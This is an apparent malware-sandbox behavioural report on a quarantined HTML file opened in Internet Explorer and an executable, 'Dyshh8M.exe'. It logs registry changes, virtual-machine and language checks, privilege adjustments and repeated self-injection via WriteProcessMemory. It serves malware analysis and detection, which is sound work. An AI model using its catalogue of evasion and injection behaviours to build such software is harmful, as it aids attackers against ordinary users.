Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000035270b48ffd339449e8f5ccf493e442b000000000200000000001066000000010000200000005494776ae6b6d78ba0e85cdca878f108b3e7f6d1ab68c7e3fad535255006bf16000000000e80000000020000200000003c0f7d067f638c46ec0fafd2a5dbbadef3d874e03175139b889da58efc9ca727200000009bb25def5f37b0c8ee88fad080efc0195f89721b5cbf672d8a3094981eb9318640000000bc6801cfb6b14bc6c6ee10a6ef12cb0e0bb3bc1de469a6f28d1bc4c2e73277f8177676c003b7072198c525f09a4c51532414289f3332f0fd2e1d4a6fc38448e7 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775436" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10e887ada888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2248 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabE209.tmp

C:\Users\Admin\AppData\Local\Temp\CabE335.tmp

C:\Users\Admin\AppData\Local\Temp\TarE367.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Analysis: behavioral6

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings\MuiCache N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateGlobalPrivilege N/A N/A N/A
Token: SeChangeNotifyPrivilege N/A N/A N/A
Token: 33 N/A N/A N/A
Token: SeIncBasePriorityPrivilege N/A N/A N/A
Token: SeCreateGlobalPrivilege N/A N/A N/A
Token: SeChangeNotifyPrivilege N/A N/A N/A
Token: 33 N/A N/A N/A
Token: SeIncBasePriorityPrivilege N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1828 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

